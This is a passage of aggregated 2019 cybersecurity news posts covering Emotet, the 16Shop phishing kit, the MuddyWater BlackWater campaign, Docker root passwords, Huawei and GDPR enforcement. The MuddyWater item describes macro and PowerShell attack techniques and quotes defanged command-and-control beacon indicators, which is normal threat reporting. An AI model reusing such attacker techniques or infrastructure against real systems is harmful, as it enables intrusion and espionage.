If your device is stolen, how can you prevent the damage from spiraling? Taking a few defensive measures can save digital nomads major headaches. Keep a device tracker enabled on all of your devices—smartphones, tablets, and laptops. Both Apple and Android have default services that will help you locate your missing device.  

But this will only help you find your property; it won’t prevent anyone from accessing the valuable data within. That’s why all of your devices should have a lock screen enabled, secured with either a pin or a biometric ID, such as your fingerprint. If you believe these efforts have failed and your device is compromised, enabling multi-factor authentication on your most sensitive accounts should help reduce the effect of the breach.  

However, if you cannot recover your device, remotely wiping it will prevent any additional data from being accessed. If you have a device tracker enabled, you will be able to remotely wipe your sensitive data with that software. If you’re using a data backup solution, any lost files will be recoverable once the status of your devices is secure 

Lower Your Risk

Being a digital nomad means that you’re at a higher risk for a breach, but that doesn’t mean you can’t take steps to lower that risk. These best practices could drastically reduce the risk incurred by leading a digitally nomadic lifestyle. 

  • Toggle off. Remember to always turn off WiFi and Bluetooth connectivity after a session. This will prevent accidental or nefarious connections that could compromise your security. 
  • Mindfulness. Be aware of your surroundings and of your devices. Forgetting a device might be an acceptable slip up for most, but for a digital nomad it can bring your lifestyle to a grinding halt. 
  • Be prepared. Secure your devices behind a trusted VPN before beginning any remote adventures. This will encrypt all of your web traffic, regardless of where you connect.  
  • Stop the spread. In case of a device or account breach, strong passwords and multi-factor authentication will help minimize the damage. 

A staggering 4.8 million Americans describe themselves as digital nomads, a number that won’t be going down anytime soon. With remote work becoming as a new norm, it’s more important than ever that we take these cybersecurity measures seriously—to protect not just ourselves, but also our businesses and clients. Are you a digital nomad making their way through the remote work landscape? Let us know your top tips in the comments below! 

The post A Cybersecurity Guide for Digital Nomads appeared first on Webroot Blog.

Core Elastic Stack security features now available to all users

Elastic, the company developing enterprise search engine Elasticsearch and the Elastic Stack, has decided to make core Elastic Stack security features accessible to all users (and not just those who have a Gold subscription). What is the Elastic Stack? Elasticsearch is the most widely used enterprise search engine in the world. It is usually used for log, business, operational and security intelligence analytics. It is part of the Elastic Stack, an integrated solution that also … More

The post Core Elastic Stack security features now available to all users appeared first on Help Net Security.

What is Emotet?

Estimated reading time: 4 minutes

Emotet malware was first identified in 2014 as Banking trojan. Emotet has evolved from banking trojan to threat distributor till now. It has hit many organizations very badly in 2018 with its functionalities like spamming and spreading. Further with its widespread rich/existence at many organizations, it became threat distributor. Since mid of 2018, Emotet is used by threat actors to spread other malwares like TrickBot, Qakbot and most dangerous Ryuk ransomware. It has also been observed that it loads modules and launches different malware depending on geographical location i.e. Country of Victim.

Malware authors strategy is to use infected systems for all means like firstly for credential stealing, further use these credentials for spreading and spamming. Finally, when all use of this infected system is done, it deploys other malwares like Ransomware, TrickBot, Qakbot.

From mid of 2018, Emotet has become headache for security providers because of its polymorphic, self-updating and spreading capabilities which makes cleaning of such infected network very complex and sometimes takes months for cleaning.

How it can enter into your system?

It enters into your system by phishing mail as shown in below fig:

Such emails contain malicious attachments like doc, pdf, xls, js, etc. Once user opens such attachment, it will download and launch Emotet. Sometimes such mail may contain malicious links, when opened by users, it downloads and launches Emotet. Other way is through lateral spreading i.e. if one of your friend or colleagues in the same network is infected with Emotet, then your friends’ machine can deploy Emotet on your machine.

What Emotet can do?

It has many capabilities like password stealing, Email Harvesting, spamming, lateral spreading, launching other malwares. All of these are discussed in detail in our research paper on EMOTET.


According to US-CERT alert released on July 20, 2018, “Emotet continues to be amongst the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.”

At Quick-Heal labs, we have seen many of our customers are badly affected because of spamming done by emotet. As malware sends many phishing mails to user’s contacts, mail server reaches its maximum limits and blocks user’s account for the day. As a result, most of the employees of such infected organization cannot send mails. Such blockages lead to disruption to regular operations or work and further potential harm to an organization’s reputation. Finally, after a week or two we were able to totally clean total network.

Ryuk ransomware infection may cause temporary or permanent loss of user’s critical data.

What Quick-Heals Telemetry says:

As you can see, number of hits per day are very high from July 2018 till April 19. It indicates how widespread it is. But same is not the case with actual numbers of customer escalations. At quick-heal Labs, even after detecting thousands of samples per day, we received many customer escalations in initial months after outbreak. Further, we added some rules, IOC’s, signatures at each level of Product features namely at Virus Protection, Behavior Detection, Email Protection, Memory scan, IDS & IPS, Machine learning based, Browsing protection. This directly affected in Zero customer escalations for Emotet from last few months with already infected customers also totally cleaned. As stats are indicating that we are detecting thousands of Emotet samples per day in last few months and still NO customer escalation/issue reported.

How can I remove Emotet?

If your machine is in network of any organization, then firstly isolate it immediately. Patch with latest updates of installed software’s and clean the system.

As Emotet can move laterally in network, your machine can be infected again when you reconnect to network. Identify and clean each infected machine in same network. It’s really complex process to follow. One can always choose Quick-heal Antivirus / Seqrite Endpoint Security to avoid this complex process and stay safe with cleaning of already infected machines and proactively blocking against future Emotet infections.

Preventive measures

  1. Keep your computer up-to-date with the latest updates of Operating system, Security software and other software.
  2. Don’t open any link in the mail received from an unknown/untrusted source.
  3. Don’t download attachments received by an unknown/untrusted source.
  4. Don’t enable ‘macros’ for Microsoft’s office documents.
  5. Educate yourself and others for keeping strong passwords.
  6. Use two-factor authentication where-ever possible.


Stats indicate that we are detecting thousands of Emotet samples per day in last few months and still NO customer escalation/issue has been reported. With this we can say that Quick Heal is able to stop Emotet till today’s date. As its always cat and mouse game between malware and security vendors, we expect evolution of Emotet to next step. We will be continuously monitoring Emotet for future also and will ensure all customers are secured from such malwares.

To read more about the detailed analysis of the Emotet, download this PDF.

The post What is Emotet? appeared first on Seqrite Blog.

How Technology and Politics Are Changing Spycraft

Interesting article about how traditional nation-based spycraft is changing. Basically, the Internet makes it increasingly possible to generate a good cover story; cell phone and other electronic surveillance techniques make tracking people easier; and machine learning will make all of this automatic. Meanwhile, Western countries have new laws and norms that put them at a disadvantage over other countries. And finally, much of this has gone corporate.

DDoS Attacks on the Rise After Long Period of Decline

DDoS Attacks on the Rise After Long Period of Decline

The number of DDoS attacks increased by 84% in the first quarter of 2019 compared to Q4 2018, according to new research from Kaspersky Lab.

The global cybersecurity company’s findings, detailed in its DDoS Attacks in Q1 2019 report, come in the wake of dramatically falling numbers of DDoS attacks recorded throughout 2018, suggesting that cyber-criminals are once again turning to DDoS as an attack method after a sustained period of shifting their attention to other sources of income last year, such as cryptomining.

What’s more, Kaspersky Lab discovered a substantial growth in the amount of attacks that lasted more than an hour. The company suggested that the launch of newer DDoS-for-Hire services could explain the sudden rise in the number of DDoS attacks in 2019.

“The DDoS attack market is changing,” said Alexey Kiselev, business development manager on the Kaspersky DDoS Protection team. “New DDoS services appear to have replaced ones shut down by law enforcement agencies. As organizations implement basic countermeasures, attackers target them with long-lasting attacks. It is difficult to say if the number of attacks will continue to grow, but their complexity is showing no signs of slowing down.

“We recommend that organizations prepare themselves effectively, in order to withstand sophisticated DDoS attacks.”

Kaspersky Labs’ advice for DDoS attack defense included:

•           Ensuring that web and IT resources can handle high traffic

•           Using professional solutions to protect the organization against attacks

HawkEye Attack Wave Sends Stolen Data to Another Keylogger Provider

A recent attack wave involving HawkEye malware sends data stolen from its victims to another keylogger provider’s website. On 21 May, My Online Security came across a new sample of HawkEye. The actual delivery mechanism itself wasn’t unique compared to previous attacks involving the malware. In this particular instance, the attack email used the lure […]… Read More

The post HawkEye Attack Wave Sends Stolen Data to Another Keylogger Provider appeared first on The State of Security.

Washington Issues Temporary License to Huawei

Washington Issues Temporary License to Huawei

The US government has issued a temporary license to Huawei and its affiliates, allowing American companies to supply the telecoms and handset giant until August.

Despite reports emerging over the weekend of various chipmakers halting supplies to the Chinese firm after it was placed on an Entity List last week, the Commerce Department appears to have softened its stance.

Issued on Monday, the temporary general license for Huawei and 68 non-US affiliates will run for 90 days, bringing it up to August 19 2019.

It covers various areas, including: supplies to ensure Huawei’s networks and equipment are fully operational; software updates for existing Huawei handsets; and disclosure of any security vulnerabilities to the firm.

The license also authorizes US firms to engage with Huawei and its affiliates “as necessary for the development of 5G standards as part of a duly recognized international standards body.”

At the same time, Huawei founder Ren Zhengfei has struck a defiant tone in state media reports, claiming the US “underestimates” the firm’s capabilities and that it has already made efforts to mitigate the impact of any supply chain restrictions.

He has also reportedly claimed that no company can catch Huawei in terms of its 5G technology, a fact that Western lawmakers are grappling with in weighing up how to treat the company.

Lock the company out of 5G completely and it could add years to implementation, impacting customers — or at least, that’s Huawei's argument.

Although UK Prime Minister Theresa May agreed only to allow Huawei to supply non-core parts of carriers’ 5G networks, the decision by the leading Five Eyes nation remains controversial.

A new report by right-wing think tank the Henry Jackson Society co-authored by a Conservative MP and a former government security advisor claims there is “significant risk” in allowing Huawei to supply the UK’s 5G networks.

The report includes a foreword from former MI6 boss, Richard Dearlove, calling on the government to reconsider its position.

Phishing Kit 16Shop Targets Apple Users, Hackers

Phishing Kit 16Shop Targets Apple Users, Hackers

Researchers have discovered a hidden backdoor in a commercial phishing kit, 16Shop, used to attack Apple customers, according to Akamai.

“When it comes to targeting Apple users and their personal and financial data, 16Shop has emerged as a go to kit for those who can afford it. While 16Shop is sold to criminals looking to collect sensitive information from a targeted subset of the Internet community, at least one pirated version circulating online houses a backdoor that siphons off the data harvested and delivers it to a Telegram channel – proving once more that there is no honor among thieves," wrote Akamai researcher Amiram Cohen.

According to the research, this highly sophisticated and neatly constructed kit has layered defenses, as well as attack mechanisms. “It's a true multi-level kit, running different stages for different brands, depending on the information the victim provides. It has the ability to change its layout and presentation depending on platform, so mobile users will see a website tailored to their device, while desktop users see something better suited to their situation,” wrote Cohen.

Credit: Akamai
Credit: Akamai

The phishing kit was allegedly developed by an Indonesian whom Cohen said “has the skill to be a legitimate security community member, as well as the skills to maintain a healthy career in development. Instead, and most unfortunately, their knowledge is applied to a criminal enterprise.”

Until now, the individual has been known only as either devilscream or Riswanda. In addition to Cohen multiple online researchers “have located various personal artifacts of Riswanda's, including GitHub repositories, security presentations, past examples of website defacements, pictures of family and friends, email address, and social media accounts.”

However, some users of the phishing kit have been sharing their criminally obtained information without their knowledge through a backdoor that makes a copy of the victim's information and secrets it over to a bot waiting in a room on Telegram, according to Cohen.

“Akamai first discovered this backdoor while examining code inside of main.php, which was obfuscated in a way that made it stand out. The highly obfuscated code collects information for all of the forms visited by the victim, and no matter what storage and delivery options are selected by the 16Shop operator, the victim's data is siphoned off and sent to the Telegram bot via API calls,” Cohen said.

The author reportedly has released video demonstrations showing active usage of Telegram as a means of data storage. “However, like other popular phishing kits, 16Shop has been pirated. Based on comparisons against multiple versions of the 16Shop, the backdoor only appears in the de-obfuscated version of the kit,” Cohen said.

Aussie Government IT Worker Arrested for Cryptomining

Aussie Government IT Worker Arrested for Cryptomining

An Australian government IT contractor has been arrested on suspicion of making thousands from an illegal cryptocurrency mining operation at work.

The 33-year-old New South Wales man appeared in court today after allegedly earning AU$9000 ($6188) by “modifying his agency’s computer systems,” according to the Australian Federal Police (AFP).

At Sydney Local Court, he was charged with unauthorized modification of data to cause impairment, and unauthorized modification of restricted data, contrary to the Criminal Code Act 1995.

The charges carry a maximum penalty of 10 years and two years behind bars, respectively.

“Australian taxpayers put their trust in public officials to perform vital roles for our community with the utmost integrity,” argued acting commander, Chris Goldsmid, AFP manager cybercrime operations. “Any alleged criminal conduct which betrays this trust for personal gain will be investigated and prosecuted.”

It’s unclear how the man was eventually caught, but his home was raided by the AFP in March and personal laptop, phone employee ID cards and data files were seized.

Cryptocurrency mining continues to be a threat to businesses, while consumer detections have fallen to almost zero, according to a Malwarebytes report released in April. It said the latter trend had been influenced by Coinhive’s decision to shut down earlier this year.

Although most cryptomining in businesses occurs covertly, directed by external botnet herders in charge of compromised machines, there is always the risk of an insider threat.

A Chinese headmaster was fired last year after secretly mining cryptocurrency using his school’s electricity supply. Hunan man Lei Hua hooked up eight mining machines to the mains, running up an electricity bill of 14,700 yuan ($2125) mining Ethereum 24 hours a day.

Microsoft updates break AV software, again!

Microsoft’s May 2019 security fixes have again disrupted the normal functioning of some endpoint security products on certain Windows versions. Current problems “We have had a few customers reporting that following on from the Microsoft Windows 14th May patches they are experiencing a hang on boot where the machines appear to get stuck on ‘Configuring 30%’,” UK-based Sophos explained. “We have currently only identified the issue on a few customers running Windows 7 and Windows … More

The post Microsoft updates break AV software, again! appeared first on Help Net Security.

Fifth of Docker Containers Have No Root Passwords

Fifth of Docker Containers Have No Root Passwords

A fifth of the world’s most popular Docker containers contain a security issue which could make them vulnerable to attack in some circumstances, a researcher has discovered.

Kenna Security principal security engineer, Jerry Gamblin, explained that after recent Cisco Talos research revealed Alpine Linux docker images were shipping with no (nulled) root passwords, he decided to dig a little deeper.

Running a script on the 1000 most popular containers in the Docker store, he found 194 (19.4%) also had nulled root passwords.

“The findings are interesting, but I don’t want to be overly alarmist. Just because a container has no root password does not mean that it is automatically vulnerable,” he explained.

“These findings could lead to configuration-based vulnerabilities in certain situations, as was the case with this the Alpine Linux vulnerability.”

Specifically, only containers which use Linux pluggable authentication modules (PAM) or “some other mechanism which uses the system shadow file as an authentication database” are vulnerable to exploitation, as Cisco detailed.

The most popular container on the list affected by the issue was kylemanna/openvpn: a software unit that has been used over 10 million times, according to Gamblin.

Other names on the list included govuk/governmentpaas, hashicorp, microsoft, monsanto and mesosphere.

In the Alpine Linux case, exposed containers could find they are at risk of Docker image vulnerability (CVE-2019-5021), whereby an attacker can elevate their privileges to root within the container.

“Deploying containers that allow users to authenticate as root should be avoided at all costs, because authenticating as root is already outside the scope of ‘best practices’ for secure containers or generally in system,” argued Gamblin.

KnowBe4 Announces Acquisition of CLTRe

KnowBe4 Announces Acquisition of CLTRe

KnowBe4 has announced the acquisition of CLTRe, adding the capability to measure security culture into its portfolio.

Led by Kai Roer, CLTRe is a Norwegian company focused on helping organizations assess, build, maintain and measure a strong security posture. It will continue to operate as an independent subsidiary of KnowBe4.

The acquisition will mean that CLTRe’s toolkit and Security Culture Framework will be available to all KnowBe4 customers later this year.

Stu Sjouwerman, CEO of KnowBe4, said: “Today’s announcement brings KnowBe4 very valuable tools to help our customers measure what matters – their security culture – so they can make decisions about how to improve. We’re excited to welcome Kai and the CLTRe team to the KnowBe4 family and to enhance our European presence while supporting more global customers.”

Roer said that KnowBe4 “is a natural fit for our evidence-based analytics and measurement tools, as KnowBe4 customers will now be able to measure their security cultures, benchmark against their industry sectors, and pinpoint exactly what kind of security culture they have.”

He said: “With KnowBe4 and CLTRe, organizations can gain true insight into their security culture, improve their security with pinpoint accuracy, report their progress to their board of directors and educate their users to make smarter security decisions.”

CLTRe measures the seven dimensions of security culture: behavior, responsibilities, cognition, norms, compliance, communication and attitudes.  

Listen to Kai Roer, along with Espen Otterstadt and Nicola Whiting, as Security Culture was discussed as part of the Infosecurity Magazine Online Summit

GDPR one year on

May 2019 marks the first anniversary since the General Data Protection Regulation came into force. What has changed in the world of privacy and data protection since then? BH Consulting looks at some of the developments around data breaches, and we briefly outline some of the high-profile cases that could impact on local interpretation of the GDPR.

Breach reporting – myths and misconceptions

Amongst the most immediate and visible impacts of the GDPR was the requirement to report data breaches to the supervisory authority. In the context of GDPR, a personal data breach means a breach of security leading to the accidental or unlawful destruction, loss, alteration, unauthorised disclosure of, or access to, personal data. The regulation introduced a duty on all organisations to report personal data breaches to the supervisory authority where they are likely to pose a risk to data subjects. This report must take place within 72 hours of the controller becoming aware of the breach, where feasible. There are additional obligations to report the breach to data subjects, without undue delay, if the breach is likely to result in a high risk of adversely affecting individuals’ rights and freedoms.

Between May 2018 when GDPR came into force, and January 2019, there were 41,502 personal data breaches reported across Europe, according to figures from the European Data Protection Board. In Ireland, the Data Protection Commission recorded 3,542 valid data security breaches from 25 May to 31 December 2018. This was a 70 per cent increase in reported valid data breaches compared to 2017.

Notwithstanding the uptick in the number of reported breaches, it has been suggested that many organisations are still unsure how to spot a data breach, when a breach may meet the criteria for reporting, or even how to go about reporting. With this in mind, the key lessons to consider are:

Not every breach needs to be reported

Organisations controlling and processing personal data should have a process in place to assess the risks to data subjects if a breach occurs. This assessment should focus on the severity and likelihood of the potential negative consequences of the breach on the data subject.

Assess the risks

When assessing whether to report, the controller will need to consider the type of breach, sensitivity and volume of the personal data involved, how easily individuals can be identified from it, the potential consequences and the characteristics of the individual or the controller (such as if the data relates to children or it involves medical information).

Who’s reporting first?

It’s possible the supervisory authority may hear about the breach from other sources including the media or affected data subjects. If this is the case, an authority such as the DPC may reach out to the affected organisation first, even before that entity has reported.

Establish the facts

As a final point, it is important not to forget that, even if you do not need to report a breach, the GDPR requires you to document the facts relating to it, its effects and remedial action taken. Therefore, you should keep a record should of all privacy incidents, even if they do not rise to a reportable level. This will help you learn from any mistakes and to meet accountability obligations.

Points to note

Keep in mind that it is not just about reporting a breach; organisations must also contain the breach, attempt to mitigate its negative effects, evaluate what happened, and prevent a repeat.

Breach reporting myths

Several misconceptions quickly emerged about GDPR, so here is a short primer to clarify them:

  1. Not all data breaches need to be reported to the supervisory authority
  2. Not all details need to be provided as soon as a data breach occurs
  3. Human error can be a source of a data breach
  4. Breach reporting is not all about punishing organisations
  5. Fines are not necessarily automatic or large if you don’t report in time

Resource cost – beyond the obvious

There have been a limited number of GDPR-related fines to date (see below) but this amount is likely to increase. Aside from financial penalties relating to breaches, organisations and businesses also need to consider the cost involved in complying with the regulation more generally.

This includes the resources needed to engage with a supervisory authority like the Data Protection Commission, as well as the amount of time it typically takes to manage a subject access request (SAR). The number of SARs is increasing because GDPR allows individuals to make a request free of charge.

GDPR enforcement actions: Google

In the runup to May 25 2018, there had been significant doubts about effective enforcement of the GDPR. If the seemingly invulnerable American social media and technology giants were able to ignore requirements without consequence, what would happen to the credibility and enforceability elsewhere? But against the current global backdrop, those technology companies have become far less invulnerable than they once seemed. Most cases are still making their way through the appeals procedure, but initial verdicts and sanctions are causing ripples for everyone within scope.

On January 21, 2019, the French Supervisory Authority for data protection (CNIL) fined Google €50 million for GDPR violations – the largest data protection fine ever imposed. The case raises several important privacy issues and provides useful insights into how one supervisory authority interprets the GDPR.

CNIL’s decision focuses on two main aspects: (i) violation of Google’s transparency obligations under the GDPR (specifically under Articles 12 and 13) and (ii) the lack of a legal basis for processing personal data (a requirement under Article 6). The CNIL is of the opinion that the consent obtained by Google does not meet the requirements for consent under the GDPR. Google is appealing the decision.

The decision dismisses the application of the GDPR’s one-stop-shop mechanism by holding that Google Ireland Limited is not Google’s main establishment in the EU (which would have made Ireland’s DPC the competent authority, rather than the CNIL). Since the fine is more than €2 million, it is clearly based on the turnover of Alphabet, Google’s holding company in the United States, not on any European entity.

GDPR enforcement actions: Facebook

On 7 February, Germany’s competition law regulator, FCO, concluded a lengthy investigation into Facebook and found that the company abused its dominant market position by making the use of its social network conditional on the collection of user data from multiple sources.

Facebook has not been fined; instead, the FCO imposed restrictions on its processing of user data from private users based in Germany. Facebook-owned services such as WhatsApp and Instagram may continue to collect data but assigning that data to a Facebook user account will only be possible with the user’s voluntary consent. Collecting data from third party websites and assigning it to a Facebook user account will also only be possible with a user’s voluntary consent.

Facebook is required to implement a type of internal unbundling; it can no longer make use of its social network conditional on agreeing to its current data collection and sharing practices relating to its other services or to third party apps and websites. Facebook intends to appeal this landmark decision under both competition and data protection law in the EU.

Other enforcement actions

After Birmingham Magistrates’ Court fined workers in two separate cases for breaching data protection laws, the UK Information Commissioner’s Office warned that employees could face a criminal prosecution if they access or share personal data without a valid reason.

The first hospital GDPR violation penalty was issued in Portugal after the Portuguese supervisory authority audited the hospital and discovered 985 hospital employees had access rights to sensitive patient health information when there were only 296 physicians employed by the hospital. The failure to implement appropriate access controls is a violation of the GDPR, and the hospital was fined €400,000 for the violations.

Lessons from year one

For data controllers and processors, the lessons to be learned from the first year of GDPR are clear:

Transparency is key

You must give users clear, concise, easily accessible information to allow them to understand fully the extent of the processing of their data. Without this information, it is unlikely any consent we collect will be considered to be a GDPR level of consent.

Fines can be large

CNIL’s response to Google demonstrates that regulators will get tough when it comes to fines and take several factors into account when determining the level of fine.

Watch the investigations

There are current 250 ongoing investigations – 200 from complaints or breaches and 50 opened independently by the data protections authorities so these will be interesting to watch in 2019.

Lead Supervisory Authority identity

Google and Facebook have both appointed the DPC in Ireland as their lead supervisory authority and have included this in the appeals process. CNIL took the lead in Google investigation, even though Google has its EU headquarters in Ireland – because the complaints were made against Google LLC (the American entity) in France.

Further challenges

There are further challenges to the way for the tech giants use personal data show no sign of dwindling. A complaint has been filed with Austria’s data protection office in respect of a breach of Article 15 GDPR, relating to users of Amazon, Apple, Netflix, Google (again) and Spotify being unable to access their data. 2019 should be an interesting year for Privacy.

What lies ahead?

The GDPR cannot be seen in isolation; it emerged at the same time as a growing public movement that frames privacy as a fundamental right. The research company Gartner identified digital ethics and privacy as one of its top trends for 2019. From a legislative perspective, the GDPR is part of a framework aimed at making privacy protection more robust.

PECR is the short form of the Privacy and Electronic Communications (EC Directive) Regulations 2003. They implement the e-privacy directive and they sit alongside the Data Protection Act and the GDPR. They give people specific privacy rights on electronic communications and they contain specific rules on marketing calls, emails, texts and faxes, cookies and similar technologies, keeping communications services secure and customer privacy relating to traffic and location data, itemised billing, line identification, and directory listings.

Further afield in the US, the California Consumer Privacy Act (CCPA) was signed into law in June 2018 and will come into effect on 1 January 2020. It’s intended to give California residents the right to know what personal data is being collected about them, and whether that information is sold or disclosed. Many observers believe the Act will trigger other U.S. states to follow suit.

For the remainder of 2019 and beyond, it promises to be an interesting time for privacy and data protection.

The post GDPR one year on appeared first on BH Consulting.

MuddyWater BlackWater campaign used new anti-detection techniques

A recent MuddyWater campaign tracked as BlackWater shows that the APT group added new anti-detection techniques to its arsenal.

Security experts at Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group (aka SeedWorm and TEMP.Zagros). 

The researchers also pointed out that the cyber espionage group has been updating its tactics, techniques, and procedures (TTPs) by adding three distinct steps to their operations to avoid the detection.

The first MuddyWater campaign was observed in late 2017 when targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

In June 2018, Trend Micro researchers discovered a new attack relying on weaponized Word documents and PowerShell scripts that appears related to the MuddyWater APT. The final payload delivered in the campaign is the PRB-BackdoorRAT, it was controlled by the command and control (C&C) server at outl00k[.]net.

This campaign aims at installing a PowerShell-based backdoor onto the victim’s machine for espionage purposes.

MuddyWater document

As part of the recent BlackWater campaign, the MuddyWater APT group leveraged an obfuscated Visual Basic for Applications (VBA) macro script to add a Run registry key and gain persistence.

Then the attackers used a PowerShell stager script masquerade as a red-teaming tool that would download a PowerShell-based Trojan from a C2 server.

The stager download from the C2 a component of the FruityC2 agent script, an open-source framework on GitHub, that uses to enumerate the host machine.

“This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity.” reads the analysis published by Talos group. “Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable “errors.txt” file would not be generated.”

The cyberspies also used to replace some variable strings in the more recent samples to avoid signature-based detection from Yara rules. 

Attackers used a document that once was opened, it prompted the user to enable the macro titled “BlackWater.bas”. They protected the macro with a password to prevent user to view it in Visual Basic. The “Blackwater.bas” macro was obfuscated using a substitution cipher whereby the characters are replaced by their corresponding integer. 

“This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is “hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”.” continues the analysis. “Notably, the trojanized document’s macro was also called “BlackWater,” and the value “BlackWater” was hard coded into the PowerShell script. Next, the script would enumerate the victim’s machine”

Experts conclude that even if the changes implemented by the threat actor were minimal, they were significant enough to avoid detection and to allow the group to continue to perform operations.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – MuddyWater, APT)

The post MuddyWater BlackWater campaign used new anti-detection techniques appeared first on Security Affairs.

Five ways automating IAM saves you money

Identity is the foundation of security, so a robust automated identity and access management (IAM) system is by far the best way to keep your company’s information safe. It’s also a great way to increase efficiency and save money. It’s no wonder so many businesses are adopting IAM systems. The global market value of identity and access management systems has grown from $4.5 billion in 2012 to $7.1 billion in 2018. By 2021, it is … More

The post Five ways automating IAM saves you money appeared first on Help Net Security.

US Commerce Department delays Huawei ban for 90 Days

US Commerce Department will delay 90 days before to apply the announced Huawei ban to avoid huge disruption of the operations.

During the weekend, the Reuters agency revealed in exclusive that Alphabet Inc’s Google has suspended some business with Huawei after Trump’s ban on the telco giant.

On Thursday, President Trump added Huawei Technologies to a trade blacklist, but on Friday, the U.S. Commerce Department said it was considering to debunk the decision on the company to “prevent the interruption of existing network operations and equipment”.

Now a Commerce Department filing confirmed that delay does not change the Trump’ ban, but gives a 90-days temporary license that will grant Huawei to continue doing business with American businesses.

The Temporary General License aims at preventing disruption to the operations of the company that could have a dramatic impact on mobile users and broadband network operators.

“The Temporary General License grants operators time to make other arrangements and (gives) the Department space to determine the appropriate long term measures for Americans and foreign telecommunications providers that currently rely on Huawei equipment for critical services,” said Secretary of Commerce Wilbur Ross.

“In short, this license will allow operations to continue for existing Huawei mobile phone users and rural broadband networks.”

Huawei ban

While the tech giant is in the middle of a heated debate, FiveEyes intelligence agencies believe the Huawei equipment for 5G infrastructure poses a “significant network security risk,” for this reason, they asked mobile companies to avoid using the equipment of the Chinese company.

The Chinese company has been founded by a former People’s Liberation Army official in 1987. The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

US intelligence believes Huawei equipment is taitend with backdoors that could allow Chinese intelligence to spy on communications networks of rival countries.

In November, The Wall Street Journal reported that the US Government is urging its allies to exclude Huawei from critical infrastructure and 5G architectures.

The United States highlighted the risks for national security in case of adoption of Huawei equipment and is inviting internet providers and telco operators in allied countries to ban Huawei.

Chinese equipment is broadly adopted in many allied countries, including Germany, Italy an, Japan. Many countries are going to build 5G infrastructure, but the approach of their governments is completely different.

Now the US Commerce Department delayed the bad for 90 days. Experts believe that Huawei is only one of the Chinese companies that will face similar measures because could threaten the economic and technological leadership of the United States.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Huawei ban, China)

The post US Commerce Department delays Huawei ban for 90 Days appeared first on Security Affairs.

Traditional approach to data security hindering digital transformation initiatives

Security professionals who adopted a more traditional or reactive approach to their data protection and security program did not believe they would reach their digital transformation goals, according to a TITUS report. The report, “The Vital Role of Security in Digital Transformation,” is based on a survey conducted by Market Strategies International of more than 600 IT decision makers at leading brands across a diverse set of industries in the United States, Canada and the … More

The post Traditional approach to data security hindering digital transformation initiatives appeared first on Help Net Security.

Instagram Influencer’s Account Information Exposed

The life of Instagram Influencers goes public. An exposed database seems to have been added to the information available about them.

According to a TechCrunch report, account details of 49 million Instagram users, including influential people and brand accounts, have been published online. The note contains public data that appears to have been extracted from Instagram user profiles, as well as personal data such as telephone numbers and e-mail addresses.

According to the report, the database belongs to Chtrbox, an Indian marketing company that connects influential people with brands who want to promote their products. Chtrbox has not responded to the matter yet.

“We’re looking into the issue to understand if the data described — including email and phone numbers — was from Instagram or from other sources,” an Instagram spokeswoman said in a statement. “We’re also inquiring with Chtrbox to understand where this data came from and how it became publicly available.”

Instagram prohibits deleting accounts in its terms of service. The website of the Chtrbox claims to have more than 184,000 Instagram influencer’s as customers, far fewer than the millions of records reportedly found in the database.

This is not for the first time that Instagram accounts have published high profile user information. In 2017, hackers used a software error in the photo-sharing app to find phone numbers and contact information of celebrities.

According to TechCrunch, independent cyber security researcher Anurag Sen found the data and found that the database is no longer visible to the public. An under-protected cloud database is another problem – a problem that grows as more and more companies, place sensitive data on cloud servers without the necessary data security expertise. Researchers around the world are looking for exposed databases and are trying to get companies to secure them. This is, for example, a cache with demographic data for 80 million American households that were removed in April.

“Celebrity Instagram users might be at risk if hackers got their hands on their private email addresses. He recommended Gmail users check their security settings through the Google Security Checkup and also set up extra login protections, including prompts and the Advance Protection Program,” said Mark Risher, head of account security at Google,

“Given the high-profile nature of some of these accounts, attackers may try to break into the email accounts as a means to impersonate the legitimate account holder,” Risher said.

Related Resources:

Instagram Accidentally Exposed Some User Passwords

Instagram New Feature to Share Location Data with Facebook

Instagram Hit By Widespread Hack And Users Locked Out

New Instagram Attack After JB’s Nude Photos Deleted

The post Instagram Influencer’s Account Information Exposed appeared first on .

SD-WAN adoption growing as enterprises embrace app-centric architecture transition

The connected era and cloud-based environment have created a need to redesign network operations, according to ResearchAndMarkets. In addition, businesses find it operationally draining to utilize resources on ensuring a connected ecosystem rather than focusing on critical business issues. Software-defined Wide Area Network (SD-WAN) helps enterprises build an agile and automated environment, which is streamlined to support new-age cloud environments and traditional Multiprotocol Label Switching (MPLS) systems in a cost-efficient manner. To understand enterprise perceptions … More

The post SD-WAN adoption growing as enterprises embrace app-centric architecture transition appeared first on Help Net Security.

Engineering teams are struggling because they’re missing the right automation

Driven by the trend of microservices creating complexity in code delivery and every company becoming a technology company, the software development community is under enormous pressure to deliver high-quality, leading-edge, and scalable code to an insatiable market. Data from a new survey by Codefresh exposes the relentless pressure, with 32 percent reporting they were not using any CI/CD tools at all, and about 60 percent agreeing that their organizations are “not using the right amount … More

The post Engineering teams are struggling because they’re missing the right automation appeared first on Help Net Security.

Women and Nonbinary People in Information Security: Yaz

